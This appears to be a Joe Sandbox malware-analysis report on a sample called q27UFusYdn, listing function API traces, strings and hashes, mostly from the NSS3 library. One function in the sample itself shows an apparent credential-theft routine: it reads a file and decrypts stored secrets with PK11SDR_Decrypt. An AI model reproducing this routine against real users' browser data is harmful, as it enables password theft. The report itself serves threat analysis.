Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: Sl$5s/
API String ID: 759478663-137276824
Opcode ID: 45ee4df1b38a939a25953efab161566c4ff2fdef68e9b33afe9dd27e9af481cc
Instruction ID: c0b5fe677b25049f6003e4a89621ab3900c92819f0e3cdb1c61edea52c7c8827
Opcode Fuzzy Hash: 45ee4df1b38a939a25953efab161566c4ff2fdef68e9b33afe9dd27e9af481cc
Instruction Fuzzy Hash: 35C183B5E006459FEB24CF69D881BEA7BB4AF0931CF240069E90697B51E731E805CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE76CA0 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CF41DE0,?), ref: 6CE76CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE76D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CE76D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CE76D82
DER_GetInteger_Util.NSS3(?), ref: 6CE76DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE76DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CE76E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CE76F19
PK11_DigestBegin.NSS3(00000000), ref: 6CE76F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CE76F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CE77011
PK11_FreeSymKey.NSS3(00000000), ref: 6CE77033
free.MOZGLUE(?), ref: 6CE7703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CE77060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CE77087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CE770AF

Strings

5s/, xrefs: 6CE76CAF

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID: 5s/
API String ID: 2108637330-340167759
Opcode ID: b13522c799df7fb1f7391066f902b6fd49db16d90bc7c52ee4c98f2703a8673d
Instruction ID: b210037acddf63e8b87cd544ed5b48a844b0ea42f71529209ba50368847f5777
Opcode Fuzzy Hash: b13522c799df7fb1f7391066f902b6fd49db16d90bc7c52ee4c98f2703a8673d
Instruction Fuzzy Hash: DFA128719142009BEB249F24DC56BAA32B8DB8130CF34493DE919CBB91E735D945C773

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CEA6BF7), ref: 6CEA6EB6

Part of subcall function 6CE01240: TlsGetValue.KERNEL32(00000040,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE01267
Part of subcall function 6CE01240: EnterCriticalSection.KERNEL32(?,?,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE0127C
Part of subcall function 6CE01240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE01291
Part of subcall function 6CE01240: PR_Unlock.NSS3(?,?,?,?,6CE0116C,NSPR_LOG_MODULES), ref: 6CE012A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CF4FC0A,6CEA6BF7), ref: 6CEA6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CEA6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CEA6EFC
PR_NewLock.NSS3 ref: 6CEA6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CEA6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CEA6BF7), ref: 6CEA6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CEA6BF7), ref: 6CEA6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CEA6BF7), ref: 6CEA6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CEA6BF7), ref: 6CEA6FFD

Strings

SSLKEYLOGFILE, xrefs: 6CEA6EB1
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CEA6FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CEA6FDB
SSLFORCELOCKS, xrefs: 6CEA6F2B
# SSL/TLS secrets log file, generated by NSS, xrefs: 6CEA6EF7
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CEA6F4F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 6c557514d430952955a606c3c890009cc4438da859d3ea1717c99e3d7b0886bf
Instruction ID: b5d7db377cf9a72a02526bc4a5091ac715de3399f76696af3c16e9923c917d93
Opcode Fuzzy Hash: 6c557514d430952955a606c3c890009cc4438da859d3ea1717c99e3d7b0886bf
Instruction Fuzzy Hash: A3A138B2E659918EEA4087BCD90134432B1AF9332DF794364E830CEFD8DBB694478291

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3AEC0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3AF39
PR_Unlock.NSS3(?,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3AF69
TlsGetValue.KERNEL32 ref: 6CE3B06B
EnterCriticalSection.KERNEL32(?), ref: 6CE3B083
PR_Unlock.NSS3(?), ref: 6CE3B0A4
TlsGetValue.KERNEL32 ref: 6CE3B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CE3B0D9
PR_Unlock.NSS3 ref: 6CE3B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE3B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE3B182

Part of subcall function 6CE6FAB0: free.MOZGLUE(?,-00000001,?,?,6CE0F673,00000000,00000000), ref: 6CE6FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CE3B177

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CE1AB95,00000000,?,00000000,00000000,00000000), ref: 6CE3B1C2

Part of subcall function 6CE61560: TlsGetValue.KERNEL32(00000000,?,6CE30844,?), ref: 6CE6157A
Part of subcall function 6CE61560: EnterCriticalSection.KERNEL32(?,?,?,6CE30844,?), ref: 6CE6158F
Part of subcall function 6CE61560: PR_Unlock.NSS3(?,?,?,?,6CE30844,?), ref: 6CE615B2

Strings

5s/, xrefs: 6CE3AECC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID: 5s/
API String ID: 4188828017-340167759
Opcode ID: c5a2c89a1495aabe6f8bdbd8f18a742fe24375a73f9d794838b9456b067b967f
Instruction ID: c5028e6b38b98efefaac0db36bf610ea926b24f9d207a831e8557fac9aa04449
Opcode Fuzzy Hash: c5a2c89a1495aabe6f8bdbd8f18a742fe24375a73f9d794838b9456b067b967f
Instruction Fuzzy Hash: 47A1D1B2E002159BEF019FA4DC41BFA77B4AF09308F244129E909A7751E735E999CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C112

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,04147990,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
StrStrA.SHLWAPI(?,041479A8,0041D72E), ref: 0040C260
StrStrA.SHLWAPI(00000000,041479C0), ref: 0040C287
StrStrA.SHLWAPI(?,041485B8,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,041431F0,00000000,?,0041DBB4,00000000,?), ref: 0040C405
StrStrA.SHLWAPI(00000000,04148618), ref: 0040C41C

Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,04143290), ref: 0040BFE1
Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1

StrStrA.SHLWAPI(?,04148618,00000000,?,0041DBBC,00000000,?,00000000,04143290), ref: 0040C4BD
StrStrA.SHLWAPI(00000000,041432E0), ref: 0040C4D4

Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

lstrlen.KERNEL32(00000000), ref: 0040C5A7
CloseHandle.KERNEL32(00000000), ref: 0040C5F9
NSS_Shutdown.NSS3 ref: 0040C607

Strings

, xrefs: 0040C133

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: 44fef13302315162d7e32ba14433b518de5c58a6dfc62e842c65371e6c7da01b
Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
Opcode Fuzzy Hash: 44fef13302315162d7e32ba14433b518de5c58a6dfc62e842c65371e6c7da01b
Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6CE18E00 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE18E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CE18E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE18EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CF418D0,?), ref: 6CE18F03
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE18F19
PL_FreeArenaPool.NSS3(?), ref: 6CE18F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE18F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE18F65
PL_FinishArenaPool.NSS3(?), ref: 6CE18FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CE18FFE
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE19012
PL_FreeArenaPool.NSS3(?), ref: 6CE19024
PL_FinishArenaPool.NSS3(?), ref: 6CE1902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CE1903E

Strings

5s/, xrefs: 6CE18E0F
security, xrefs: 6CE18EE7

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security$5s/
API String ID: 3512696800-2291600020
Opcode ID: 96dbbdf00cba886386cf3651989f11d64bbca318f341517ad20a1cab08eda009
Instruction ID: c65ef86a1d799aaedbdda870336843597d4edf728e7b65a4db4979099a5fb926
Opcode Fuzzy Hash: 96dbbdf00cba886386cf3651989f11d64bbca318f341517ad20a1cab08eda009
Instruction Fuzzy Hash: 4F5127B560C300ABD7205A549C41FAB77B8AB8635CF76082EF45997F40E731D929C762

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5EDD0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CE5EE0B

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE5EEE1

Part of subcall function 6CE51D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CE51D7E
Part of subcall function 6CE51D50: EnterCriticalSection.KERNEL32(?), ref: 6CE51D8E
Part of subcall function 6CE51D50: PR_Unlock.NSS3(?), ref: 6CE51DD3

TlsGetValue.KERNEL32 ref: 6CE5EE51
EnterCriticalSection.KERNEL32(?), ref: 6CE5EE65
PR_Unlock.NSS3(?), ref: 6CE5EEA2
free.MOZGLUE(?), ref: 6CE5EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CE5EED0
PR_Unlock.NSS3(?), ref: 6CE5EF48
free.MOZGLUE(?), ref: 6CE5EF68
PR_SetError.NSS3(00000000,00000000), ref: 6CE5EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CE5EFA4
free.MOZGLUE(?), ref: 6CE5EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CE5F055
free.MOZGLUE(?), ref: 6CE5F060

Strings

5s/, xrefs: 6CE5EDE4

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID: 5s/
API String ID: 2524771861-340167759
Opcode ID: 346d812340547148af27f610e8822a961bf5ca8e2b1c984ead6b26f801a433e9
Instruction ID: 7d75f86d171788d07f6acc74f5ecc7fc688718eeb56e20763b7b3b5c3aac9fbb
Opcode Fuzzy Hash: 346d812340547148af27f610e8822a961bf5ca8e2b1c984ead6b26f801a433e9
Instruction Fuzzy Hash: 93818271E10605ABDF00DFA5DC45BEE7BB5BF09318F640028E919A3711EB36E924CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24CF0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CE24D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CE24D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CE24DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE24E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CE24E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CE24E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CE24E85
DER_Encode_Util.NSS3(?,?,6CF705A4,00000000), ref: 6CE24EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CE24F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CE24F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE24F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE24F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE24F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE24FC8

Strings

5s/, xrefs: 6CE24D05

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID: 5s/
API String ID: 2843999940-340167759
Opcode ID: 4c982dce8ffaf5bdd2c827487a01142e08098a484488be4db32e49adb90acd97
Instruction ID: c5abc80f4f1c1221f8c268c3c5baee11f7355fff94591bd722aade9c72eab89f
Opcode Fuzzy Hash: 4c982dce8ffaf5bdd2c827487a01142e08098a484488be4db32e49adb90acd97
Instruction Fuzzy Hash: E081AFB1908301AFE711CF24D841B5AB7F4AB8535CF24852EF958DB740E775E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE20470 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE204B7

Part of subcall function 6CE70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71000
Part of subcall function 6CE70FF0: PR_NewLock.NSS3(?,00000800,6CE0EF74,00000000), ref: 6CE71016
Part of subcall function 6CE70FF0: PL_InitArenaPool.NSS3(00000000,security,6CE187ED,00000008,?,00000800,6CE0EF74,00000000), ref: 6CE7102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE20539

Part of subcall function 6CE71200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE71228
Part of subcall function 6CE71200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CE71238
Part of subcall function 6CE71200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE7124B
Part of subcall function 6CE71200: PR_CallOnce.NSS3(6CF72AA4,6CE712D0,00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE7125D
Part of subcall function 6CE71200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CE7126F
Part of subcall function 6CE71200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CE71280
Part of subcall function 6CE71200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CE7128E
Part of subcall function 6CE71200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CE7129A
Part of subcall function 6CE71200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CE712A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE2054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE2056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE205CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6CE205EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6CE205FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6CE20621
PR_EnterMonitor.NSS3 ref: 6CE2063E
PR_ExitMonitor.NSS3 ref: 6CE20668
CERT_DestroyCertificate.NSS3(?), ref: 6CE20697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE206AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE206CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE206DA

Part of subcall function 6CE1E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6CE204DC,?,?), ref: 6CE1E6C9
Part of subcall function 6CE1E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6CE204DC,?,?), ref: 6CE1E6D9
Part of subcall function 6CE1E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6CE204DC,?,?), ref: 6CE1E6F4
Part of subcall function 6CE1E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE204DC,?), ref: 6CE1E703
Part of subcall function 6CE1E6B0: CERT_FindCertIssuer.NSS3(?,?,6CE204DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE1E71E

Part of subcall function 6CE1F660: PR_EnterMonitor.NSS3(6CE2050F,?,00000001,?,?,?), ref: 6CE1F6A8
Part of subcall function 6CE1F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6CE1F6C1
Part of subcall function 6CE1F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6CE1F7C8

Strings

5s/, xrefs: 6CE2047F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID: 5s/
API String ID: 2470852775-340167759
